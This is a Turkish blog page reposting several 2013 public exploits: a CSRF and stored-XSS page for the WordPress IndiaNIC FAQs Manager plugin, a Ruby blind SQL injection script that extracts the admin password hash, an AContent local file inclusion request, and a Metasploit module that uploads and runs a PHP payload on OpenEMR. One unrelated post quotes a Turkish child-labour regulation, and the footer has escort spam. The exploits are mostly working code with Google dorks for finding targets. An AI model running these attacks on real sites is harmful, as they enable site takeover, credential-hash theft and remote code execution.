admin | 25 Mart 2013
No comments

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Multiple Vulnerabilities

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Versiyonunda bulunan CSRF açığına ilişkin exploit aşağıdaki gibidir.

 <html> 
 <!--
# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF   XSS
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7 squeeze14 with Suhosin-Patch (cli)


##############
# Description:
##############
# IndiaNIC FAQ Settings Page is vulnerable for CSRF.
# The Ask Question area (front-end) is vulnerable for XSS. It is possible to insert  <script> alert(1) </script>  in question parameter.
# The Captcha value can be read from captcha parameter (hidden field)
#



###################################
#### Part of Ask Question form ####
###################################
 <form action="" method="POST" name="iNICfaqsAskForm_1"> 
 <input type="hidden" value="1" name="group_id"> 
 <input type="hidden" value="1" name="from_user"> 
 <input type="hidden" value="inic_faq_questions" name="action"> 
 <input type="hidden" value="5540" name="captcha">     <=================== We don&#39;t need the captcha Image when we have this xD


####################################################################
#### Request from Ask Question area (XSS in question parameter) ####
####################################################################
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:9001/wordpress/?p=11
Content-Length: 143
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=&question=XSS TEST  <script> alert(1) </script> ?&captcha_code=8560

# When admin navigate to Question-Area (back-end) arbitrary JavaScript will execute.



#######################################################################
--> 
         <title> Download </title> 
 <body> 

         <!-- replace "127.0.0.1:9001/wordpress" --> 
         <form action="http://127.0.0.1:9001/wordpress/wp-admin/admin-ajax.php" method="POST"> 
         <input type="hidden" name="action" value="inic_faq_settings" /> 
         <input type="hidden" name="alert_email_address" value="" /> 
         <input type="hidden" name="capture_email" value="1" /> 
         <input type="hidden" name="notify_when_answered" value="1" /> 
         <input type="hidden" name="listing_template" value="lalalalalalalalalalalalal" /> 
         <input type="hidden" name="custom_css" value="babaaaaaammmmmmmm" /> 
         <input type="hidden" name="custom_js" value="alert(1234)" /> 
         </form> 
         <script> document.forms[0].submit(); </script> 

 </body> 
 </html>
Category: Genel | Tags:
admin | 25 Mart 2013
One comment

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Blind SQL Injection

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Blind SQL Injection açığı bulunmuş olup, Açık ve Açığın oluşum yerleri hakkıda exploit

# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin Blind SQL Injection
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7 squeeze14 with Suhosin-Patc=
h (cli)

##############
# Description:
##############
# The "order" and "orderby" parameter is vulnerable for SQL Injection
# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=3Din=
ic_faq&orderby=3D <sqli> 
# PoC take some time to finish (15min on my Testsystem).
# I could speed it up with Multithreading but I&#39;m to lazy right now


#### Vulnerable code part (wp_list_table.php) #############################=
###################################
#
# function prepare_items() {
#  $this-> _column_headers =3D array($this-> _columns, $this-> _hidden_columns=
, $this-> _sortable_columns);
#  $sort_order =3D isset($_GET[&#39;order&#39;]) ? $_GET[&#39;order&#39;] : "ASC";
#  $orderby_column =3D isset($_GET[&#39;orderby&#39;]) ? " ORDER BY {$_GET[&#39;orderby=
&#39;]} {$sort_order}" : false;
#
#  global $wpdb;
#  if (is_array($this-> _sql)) {
#    if ($orderby_column =3D=3D false) {
#      $data =3D $this-> _sql;
#    } else {
#      $data =3D $this-> _sql;
#      usort($data, array(&$this, &#39;usort_reorder&#39;));
#    }
#  } else {
#    $data =3D $wpdb-> get_results("{$this-> _sql}{$orderby_column}", ARRAY_A=
);
#  }
###########################################################################=
#####################################



#################################
#### Blind SQL Injection PoC ####
#################################
require "net/http"
require "uri"

$target =3D "" # EDIT ME #
$cookie =3D "" # EDIT ME # authenticated user session

# Example:
#$target =3D "http://127.0.0.1:9001/wordpress/"
#$cookie =3D "wordpress_a6a5d84619ae3f833460b386c064b9e5=3Dadmin|13640405=
45|86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=3Deditor=html; wp-se=
ttings-time-1=3D1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5=
=3Dtony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=3Dtony@bau=
er.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=3Dhttp://s=
ucker.de; wordpress_test_cookie=3DWP Cookie check; wordpress_logged_in_a6a5=
d84619ae3f833460b386c064b9e5=3Dadmin|1364040545|d7053b96adaa95745023b91=
694bf30ef; PHPSESSID=3D1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage=
=3D1"

if $target.eql?("") or $cookie.eql?("")
    puts "n[!]tPlease set $target and $cookie variablen"
    raise
end

$chars =3D ["."]   ("a".."z").to_a   ("A".."Z").to_a   ("0".."9").to_a
$hash =3D "$P$"
$i =3D 0 # chars index
$j =3D 4 # hash index


def sqli_send()
    sqli =3D URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$=
j}, 1)) FROM wp_users WHERE id =3D 1) =3D #{$chars[$i].ord}) THEN 1 ELSE 1*=
(SELECT table_name FROM information_schema.tables)END) --")
    uri =3D URI.parse("#{$target}wp-admin/admin.php?page=3Dinic_faq&orderby=
=3D#{sqli}")
    http =3D Net::HTTP.new(uri.host, uri.port)
    #http.set_debug_output($stderr)
    request =3D Net::HTTP::Get.new(uri.request_uri)
    request["User-Agent"] =3D "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;=
 rv:19.0) Gecko/20100101 Firefox/19.0"
    request["Cookie"] =3D $cookie
    resp =3D http.request(request)
    if( resp.code !=3D "200" )
        puts "something is wrong response =3D #{resp.code}"
        raise
    end
    # In WordPress default settings there will no SQL error displayed
    # but when an error apperes we don&#39;t get any result.
    # The PoC search for "No record found" and suppose there was an error
    return resp.body().match(/No record found/)=20
end

def print_status()
    output =3D "HASH: #{$hash} try #{$chars[$i]}"
    print "b"*output.length   output
end

while( $hash.length  < 34 )
    if( !sqli_send() )
        $hash  =3D $chars[$i]
        $j  =3D 1
        $i =3D 0
    else
        $i  =3D 1
    end
    print_status()
end
puts "n[ ]thave a nice day :-)n"
Category: Genel | Tags:
admin | 25 Mart 2013
No comments

AContent 1.3 – Local File Inclusion

acontent-lfiAContent 1.3 – Local File Inclusion açığı bulunmuş olup, Açığın oluşum yeri Aşağıdaki gibidir

##########################################
[~] Exploit Title: AContent 1.3 Local File Inclusion
[~] Date: 21-03-2013
[~] Author: DaOne
[~] Vendor Homepage: http://atutor.ca/acontent/
[~] Software Link: https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download
[~] Category: webapps/php
[~] Version: 1.3
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6
##########################################

# Exploit
POST http://localhost/AContent/oauth/lti/common/tool_provider_outcome.php HTTP /1.1

grade=1&key=1&secret=secret&sourcedid=1&submit=Send Grade&url=../../../include/config.inc.php

-end-
Category: Genel | Tags:
admin | 25 Şubat 2013
No comments

Çocuk ve Genç İşçilerin Çalıştırılma Usul ve Esasları Hakkında Yönetmelik

 

Çalışma ve Sosyal Güvenlik Bakanlığından:

 

Çocuk ve Genç İşçilerin Çalıştırılma Usul ve Esasları Hakkında Yönetmelik

 

(06 Nisan 2004 tarih ve 25425 sayılı R.,G’de yayımlanmıştır.)

 

BİRİNCİ KISIM

 

Genel Hükümler

 

BİRİNCİ BÖLÜM

 

Amaç, Kapsam, Dayanak ve Tanımlar

 

Amaç

 

Madde 1 — Bu Yönetmeliğin amacı, çocuk ve genç işçilerin sağlık ve güvenliklerini, fiziksel, zihinsel, ahlaki ve sosyal gelişmelerini veya öğrenimlerini tehlikeye atmadan çalışma şekillerinin esaslarını belirlemek ve ekonomik istismarlarını önlemektir.

 

Kapsam

 

Madde 2 — Bu Yönetmelik, 4857 sayılı İş Kanununun 71 inci maddesi gereğince, 18 yaşını doldurmamış çocuk ve genç işçiler bakımından yasak olan işler ile 15 yaşını tamamlamış, ancak 18 yaşını tamamlamamış genç işçilerin çalışmasına izin verilecek işler, 14 yaşını bitirmiş ve ilköğretimini tamamlamış çocukların çalıştırılabilecekleri hafif işler ve çalışma koşullarına ilişkin usul ve esasları kapsar.

 

Dayanak

 

Madde 3 — Bu Yönetmelik, 10/6/2003 tarihli ve 25134 sayılı Resmî Gazete’de yayımlanarak yürürlüğe giren 4857 sayılı İş Kanununun 71 inci maddesine dayanılarak hazırlanmıştır. Read more

Category: Genel | Tags: ,
admin | 20 Şubat 2013
No comments

OpenEMR PHP File Upload Vulnerability PHP File Upload Vulnerability

OpenEMR PHP File Upload Açığına ilişkin metasploit exploit aşağıdaki gibidir.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "OpenEMR PHP File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the
        ofc_upload_image.php file from the openflashchart library, a malicious user can
        upload a file to the tmp-upload-images directory without any authentication, which
        results in arbitrary code execution. The module has been tested successfully on
        OpenEMR 4.1.1 over Ubuntu 10.04.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gjoko Krstic <gjoko[at]zeroscience.mk>', # Discovery, PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '90222' ],
          [ 'BID', '37314' ],
          [ 'EBD', '24492' ],
          [ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ],
          [ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ]
        ],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['OpenEMR 4.1.1', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 13 2013",
      'DefaultTarget'  => 0))
 
      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to EGallery', '/openemr'])
        ], self.class)
  end
 
  def check
    uri = target_uri.path
    peer = "#{rhost}:#{rport}"
 
    # Check version
    print_status("#{peer} - Trying to detect installed version")
 
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "interface", "login", "login.php")
    })
 
    if res and res.code == 200 and res.body =~ /v(\d\.\d\.\d)/
      version = $1
    else
      return Exploit::CheckCode::Unknown
    end
 
    print_status("#{peer} - Version #{version} detected")
 
    if version > "4.1.1"
      return Exploit::CheckCode::Safe
    end
 
    # Check for vulnerable component
    print_status("#{peer} - Trying to detect the vulnerable component")
 
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php"),
    })
 
    if res and res.code == 200 and res.body =~ /Saving your image to/
      return Exploit::CheckCode::Detected
    end
 
    return Exploit::CheckCode::Safe
  end
 
  def exploit
    uri = target_uri.path
 
    peer = "#{rhost}:#{rport}"
    payload_name = rand_text_alpha(rand(10) + 5) + '.php'
    my_payload = payload.encoded
 
    print_status("#{peer} - Sending PHP payload (#{payload_name})")
    res = send_request_raw({
      'method'  => 'POST',
      'uri'     => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}",
      'headers' => { "Content-Length" => my_payload.length.to_s },
      'data'    => my_payload
    })
 
    # If the server returns 200 and the body contains our payload name,
    # we assume we uploaded the malicious file successfully
    if not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/
      fail_with(Exploit::Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!")
    end
 
    register_file_for_cleanup(payload_name)
 
    print_status("#{peer} - Executing PHP payload (#{payload_name})")
    # Execute our payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("#{uri}", "library", "openflashchart", "tmp-upload-images", payload_name),
    })
 
    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either.  Print the status code for debugging purposes.
    if res and res.code != 200
      print_error("#{peer} - Server returned #{res.code.to_s}")
    end
  end
 
end
Category: Genel | Tags:
« Older Entries   Recent Entries »
escort bayan escort